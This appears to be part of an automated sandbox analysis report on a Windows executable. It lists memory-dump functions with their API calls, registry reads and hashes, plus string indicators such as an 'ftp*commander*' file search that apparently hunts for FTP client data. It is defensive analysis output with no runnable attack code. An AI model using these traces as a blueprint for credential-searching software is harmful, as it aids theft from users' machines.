                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: #$&$ftp*commander*
                  • API String ID: 3438805939-1149875651
                  • Opcode ID: 5b274e86ecfa94f023ab10c4bc64147d8c024bc00b4ff254a4a9ffef51946c32
                  • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                  • Opcode Fuzzy Hash: 5b274e86ecfa94f023ab10c4bc64147d8c024bc00b4ff254a4a9ffef51946c32
                  • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094A9
                  • SysFreeString.OLEAUT32(?), ref: 004094AE
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: FreeString
                  • String ID: _blank$an.yandex.ru/count
                  • API String ID: 3341692771-25359924
                  • Opcode ID: 220b2bda2c3fa2e17afd3876e6e131a3eeacb4788efdd8cad2f7b8a0937d0ae5
                  • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                  • Opcode Fuzzy Hash: 220b2bda2c3fa2e17afd3876e6e131a3eeacb4788efdd8cad2f7b8a0937d0ae5
                  • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Open
                  • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                  • API String ID: 71445658-3061378640
                  • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                  • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                    • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                    • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                  • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                  • String ID:
                  • API String ID: 3604167287-0
                  • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                  • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                  • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                  • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                  APIs
                  • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                  • CharLowerW.USER32(00408795), ref: 004095D8
                  • SysFreeString.OLEAUT32(00408795), ref: 00409608
                  • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CharFreeLowerString
                  • String ID:
                  • API String ID: 2335467167-0
                  • Opcode ID: a9b2d518bc86f0d25b60cd0557e0d7d5801712bcf914245b10683875f4897775
                  • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                  • Opcode Fuzzy Hash: a9b2d518bc86f0d25b60cd0557e0d7d5801712bcf914245b10683875f4897775
                  • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                  APIs
                  • GetSystemTime.KERNEL32(?,00000000,?), ref: 0040727C
                  • SystemTimeToFileTime.KERNEL32(?,?,00000000,?), ref: 004072C1
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                  • __aulldiv.LIBCMT ref: 004072E3
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: 0c4dc03f5a347e2c27f051dc2031945d9a04d2897cd941f14c1bc42406c11d92
                  • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                  • Opcode Fuzzy Hash: 0c4dc03f5a347e2c27f051dc2031945d9a04d2897cd941f14c1bc42406c11d92
                  • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                  APIs
                  • GetSystemTime.KERNEL32(?,00000000), ref: 004072F9
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                  • __aulldiv.LIBCMT ref: 00407359
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: 4f6d7255259d029fcefee0a6ef84dda989e1e538c9ce85064cb776bb0b095d3e
                  • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                  • Opcode Fuzzy Hash: 4f6d7255259d029fcefee0a6ef84dda989e1e538c9ce85064cb776bb0b095d3e
                  • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: -
                  • API String ID: 885266447-2547889144
                  • Opcode ID: 9768e3a2316649ce80f3092f0a8653cf88643bc84f5cb20062fd1d2db9b0b25f
                  • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                  • Opcode Fuzzy Hash: 9768e3a2316649ce80f3092f0a8653cf88643bc84f5cb20062fd1d2db9b0b25f
                  • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409868
                  • SysAllocString.OLEAUT32(?), ref: 00409876
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: AllocString
                  • String ID: "URL"
                  • API String ID: 2525500382-1734660058
                  • Opcode ID: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                  • Instruction ID: a1d8355846c3e17605cb56d648b2f311708773d78851072204e2f77cd01d539a
                  • Opcode Fuzzy Hash: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                  • Instruction Fuzzy Hash: E9F0A77650011997CF00AF64CC00ED637E9BB84348F0444B7E904E7240D974D9058F54
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004097ED
                  • SysAllocString.OLEAUT32(?), ref: 004097FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: AllocString
                  • String ID: "domain"
                  • API String ID: 2525500382-3540696003
                  • Opcode ID: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                  • Instruction ID: 2ab7b57618223888890007651f958d72a6f850cfddda49e7e7e9e9b765f43e97
                  • Opcode Fuzzy Hash: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                  • Instruction Fuzzy Hash: AEF0A776500119ABCF00AF64CC04ED677E8BB84308F1444A7F908E7240EA7499058F50